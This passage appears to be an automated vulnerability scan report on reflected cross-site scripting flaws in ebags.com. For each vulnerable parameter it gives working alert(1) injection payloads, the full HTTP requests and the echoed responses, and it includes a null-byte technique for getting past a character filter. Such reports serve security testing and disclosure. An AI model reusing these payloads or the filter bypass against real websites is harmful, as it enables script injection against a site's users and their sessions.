Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:05:03 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822CB96B272DALERT281292D27C04ABDB9AA2; expires=Sun, 02-Jan-2011 14:05:03 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 47279


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/help/index.cfm?43aea"><script>alert(1)</script>e2a6fc36772=1&quicksignlink=pageend">
...[SNIP]...

1.7. http://www.ebags.com/members/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /members/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dda0a"><script>alert(1)</script>9e2f7f5dbc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /members/index.cfm?dda0a"><script>alert(1)</script>9e2f7f5dbc0=1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:56 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:03:56 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 45916


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/members/index.cfm?dda0a"><script>alert(1)</script>9e2f7f5dbc0=1&quicksignlink=pageend">
...[SNIP]...

1.8. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [&sourceID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /product/case-logic/sony-psp-game-case/120830

Issue detail

The value of the &sourceID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89008"-alert(1)-"e04fbf12b01 was submitted in the &sourceID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product/case-logic/sony-psp-game-case/120830?&sourceID=BECOME01$couponid=40959822productid=89008"-alert(1)-"e04fbf12b01 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:05 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D89008%2DALERT%281%29%2DE04FBF12B01; expires=Sun, 02-Jan-2011 14:04:05 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 76521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h
...[SNIP]...
hfComparisonChartSkuId").get(0).value=skuid;$("#hfComparisonReturnUrl").get(0).value="http://www.ebags.com:80/product/case-logic/sony-psp-game-case/120830?&sourceID=BECOME01$couponid=40959822productid=89008"-alert(1)-"e04fbf12b01productid="+skuid;});(function($,eBags){var txtPostalCode=$("#txtPostalCode"),divEddResult=$("#divEddResult"),divEddError=$("#divEddError"),divEddProcessing=$("#divEddProcessing")
doneProcessing=false,
...[SNIP]...

1.9. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /product/case-logic/sony-psp-game-case/120830

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00e855f"-alert(1)-"ff69dd32d95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e855f"-alert(1)-"ff69dd32d95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /product/case-logic/sony-psp-game-case/120830?&sourceID=BECOME01$couponid=40959822productid=&%00e855f"-alert(1)-"ff69dd32d95=1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:05:05 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:05:05 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 76567


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h
...[SNIP]...
mparisonChartSkuId").get(0).value=skuid;$("#hfComparisonReturnUrl").get(0).value="http://www.ebags.com:80/product/case-logic/sony-psp-game-case/120830?&sourceID=BECOME01$couponid=40959822productid=&%00e855f"-alert(1)-"ff69dd32d95=1productid="+skuid;});(function($,eBags){var txtPostalCode=$("#txtPostalCode"),divEddResult=$("#divEddResult"),divEddError=$("#divEddError"),divEddProcessing=$("#divEddProcessing")
doneProcessing=fals
...[SNIP]...

1.10. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /product/case-logic/sony-psp-game-case/120830

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22488"-alert(1)-"de7d1c87b4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product/case-logic/sony-psp-game-case/120830?productid=1312640&sourceID=BECOME01$couponid=40959822&22488"-alert(1)-"de7d1c87b4f=1 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 14:00:22 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: CFID=723756; domain=.ebags.com; expires=Tue, 24-Dec-2019 14:00:22 GMT; path=/
Set-Cookie: CFTOKEN=74455619; domain=.ebags.com; expires=Tue, 24-Dec-2019 14:00:22 GMT; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:00:22 GMT; path=/
Set-Cookie: SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 76584


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...
ted);$("#hfComparisonChartSkuId").get(0).value=skuid;$("#hfComparisonReturnUrl").get(0).value="http://www.ebags.com:80/product/case-logic/sony-psp-game-case/120830?&sourceID=BECOME01$couponid=40959822&22488"-alert(1)-"de7d1c87b4f=1productid="+skuid;});(function($,eBags){var txtPostalCode=$("#txtPostalCode"),divEddResult=$("#divEddResult"),divEddError=$("#divEddError"),divEddProcessing=$("#divEddProcessing")
doneProcessing=fals
...[SNIP]...

1.11. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [productid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /product/case-logic/sony-psp-game-case/120830

Issue detail

The value of the productid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa886"-alert(1)-"8f11ec469ac was submitted in the productid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product/case-logic/sony-psp-game-case/120830?productid=1312640aa886"-alert(1)-"8f11ec469ac&sourceID=BECOME01$couponid=40959822 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:58:49 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: CFID=440601; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:58:49 GMT; path=/
Set-Cookie: CFTOKEN=13248575; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:58:49 GMT; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 13:58:49 GMT; path=/
Set-Cookie: SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 76615


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...
ointsPotentialFormatted);$("#hfComparisonChartSkuId").get(0).value=skuid;$("#hfComparisonReturnUrl").get(0).value="http://www.ebags.com:80/product/case-logic/sony-psp-game-case/120830?productid=1312640aa886"-alert(1)-"8f11ec469ac&sourceID=BECOME01$couponid=40959822productid="+skuid;});(function($,eBags){var txtPostalCode=$("#txtPostalCode"),divEddResult=$("#divEddResult"),divEddError=$("#divEddError"),divEddProcessing=$("#divE
...[SNIP]...

1.12. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [sourceID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /product/case-logic/sony-psp-game-case/120830

Issue detail

The value of the sourceID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93fa1"-alert(1)-"0e3d8adb254 was submitted in the sourceID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product/case-logic/sony-psp-game-case/120830?productid=1312640&sourceID=BECOME01$couponid=4095982293fa1"-alert(1)-"0e3d8adb254 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:59:21 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: CFID=574742; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:59:21 GMT; path=/
Set-Cookie: CFTOKEN=19870762; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:59:21 GMT; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D4095982293FA1%2DALERT%281%29%2D0E3D8ADB254; expires=Sun, 02-Jan-2011 13:59:21 GMT; path=/
Set-Cookie: SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 76574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...
tted);$("#hfComparisonChartSkuId").get(0).value=skuid;$("#hfComparisonReturnUrl").get(0).value="http://www.ebags.com:80/product/case-logic/sony-psp-game-case/120830?&sourceID=BECOME01$couponid=4095982293fa1"-alert(1)-"0e3d8adb254productid="+skuid;});(function($,eBags){var txtPostalCode=$("#txtPostalCode"),divEddResult=$("#divEddResult"),divEddError=$("#divEddError"),divEddProcessing=$("#divEddProcessing")
doneProcessing=false,
...[SNIP]...

1.13. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [testimonialsortlink parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /product/case-logic/sony-psp-game-case/120830

Issue detail

The value of the testimonialsortlink request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb05f"-alert(1)-"7d07bd6c104 was submitted in the testimonialsortlink parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product/case-logic/sony-psp-game-case/120830?productid=1312640&sourceID=BECOME01$couponid=40959822&testimonialsortlink=newestfb05f"-alert(1)-"7d07bd6c104 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:05:39 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:05:39 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 76671


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h
...[SNIP]...
SkuId").get(0).value=skuid;$("#hfComparisonReturnUrl").get(0).value="http://www.ebags.com:80/product/case-logic/sony-psp-game-case/120830?&sourceID=BECOME01$couponid=40959822&testimonialsortlink=newestfb05f"-alert(1)-"7d07bd6c104productid="+skuid;});(function($,eBags){var txtPostalCode=$("#txtPostalCode"),divEddResult=$("#divEddResult"),divEddError=$("#divEddError"),divEddProcessing=$("#divEddProcessing")
doneProcessing=false,
...[SNIP]...

1.14. http://www.ebags.com/products/index.cfm [modelid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /products/index.cfm

Issue detail

The value of the modelid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f282"><script>alert(1)</script>829a140d05b was submitted in the modelid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/index.cfm?fuseaction=more_testimony&modelid=1208302f282"><script>alert(1)</script>829a140d05b&min_testimonial=1&max_testimonial=3&testimonialsortlink=newest&ProdDetail_Link=Testimonials HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:18:19 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:18:19 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 42740


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/products/index.cfm?fuseaction=more_testimony&modelid=1208302f282"><script>alert(1)</script>829a140d05b&min_testimonial=1&max_testimonial=3&testimonialsortlink=newest&ProdDetail_Link=Testimonials&quicksignlink=pageend">
...[SNIP]...

1.15. http://www.ebags.com/products/index.cfm [productid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /products/index.cfm

Issue detail

The value of the productid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df556"-alert(1)-"271370c27cf was submitted in the productid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/index.cfm?modelid=120830&productid=1312640df556"-alert(1)-"271370c27cf&sourceid=become01$couponid=40959822&quicksignlink=pageend HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:18:30 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID; expires=Sun, 02-Jan-2011 14:18:30 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 76737


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h
...[SNIP]...
